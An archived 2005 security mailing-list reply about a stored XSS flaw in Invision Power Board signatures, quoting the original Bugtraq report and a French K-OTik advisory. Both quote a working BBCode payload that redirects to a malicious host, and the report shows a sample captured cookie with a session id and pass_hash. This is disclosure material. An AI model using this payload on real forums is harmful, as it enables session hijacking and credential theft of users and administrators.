Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: Invision Power Board v2.0.3 XSS vulnerabilities

from [alex] Network Security [Permanent Link]
Subject: RE: Invision Power Board v2.0.3 XSS vulnerabilities
Date: Thu, 31 Mar 2005 22:06:40 +0400 
This bug was published a few month ago (15 jan 2005):

http://www.securitylab.ru/51808.html
 

-----Original Message-----
From: hoang yen [mailto:vnwebmasters@yahoo.com] 
Sent: Tuesday, March 29, 2005 12:59 PM
To: bugtraq@securityfocus.com
Subject: Invision Power Board v2.0.3 XSS vulnerabilities



Invision Power Board v2.0.3 XSS vulnerabilities found more at user
signature. when Admin read attacker topics, admin will lost his pass_hash

example
[session_id=f2600ff71ea895e6b9dedb5fd9480d16;%20member_id=48;%20pass_hash=8e
e00894ca583f64a85fd41a47048d14;%20topicsread=a%3A7%3A%7Bi%3A498%3Bi%3A111164
9756%3Bi%3A485%3Bi%3A1111649822%3Bi%3A494%3Bi%3A1111651530%3Bi%3A488%3Bi%3A1
111653254%3Bi%3A481%3Bi%3A1111655869%3Bi%3A490%3Bi%3A1111654241%3Bi%3A250%3B
i%3A1111655785%3B%7D;%20modtids=%2C;%20anonlogin=-1] 

I post this topic because  v2.0.3 also get bugs not only 1.3.1 and all
atacker can hack by this code 

exploit
[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascrip
t:document.location.replace('http://www.servermalicieux.com');")

Viethacker.org
Hoangyenxinhdep - dora

-----------------------------------------

Date de Publication : 2005-02-21 L K-OTik.COM - Voir Notice LИgale  
Titre: Invision Power Board SML Codes Cross Site Scripting Vulnerability
K-OTik ID : AVIS-2005-0191
Risque : Bas 
Exploitable Ю distance : Oui
Exploitable en local : Oui

* Description Technique *

Une vulnИrabilitИ a ИtИ identifiИe dans Invision Power Board, elle pourrait
Йtre exploitИe par un attaquant afin de rИaliser des attaques par Cross Site
Scripting. Le problХme rИsulte d'une erreur prИsente au niveau de la gestion
des signatures qui ne sont pas correctement filtrИes, ce qui pourrait Йtre
exploitИ afin d'injection du code HTML cotИ client via une signature
spИcifique.

[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascrip
t:document.location.replace('http://www.servermalicieux.com');")

* Versions VulnИrables *

Invision Power Board version 1.3.1 et infИrieures 

* Solution *

Aucune solution officielle pour l'instant

* RИfИrences *

http://www.k-otik.com/bugtraq/bulletins/937 

* CrИdit *

VulnИrabilitИs dИcouvertes par Daniel A.

* ChangeLog *

2005-02-21 : Version Initiale
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  WindowsXP malformed .wmf files DoS, liquid
Next by Date:  RE: eBay Account Phishing with eBay Redirect - Ebay fixed this + related XSS hole, Rager, Anton (Anton)
Previous by Thread:  Invision Power Board v2.0.3 XSS vulnerabilities, hoang yen
Next by Thread:  Multiple sql injection, and xss vulnerabilities in PortalApp, dcrab
Indexes:  [Date] [Thread] [Top] [All Lists]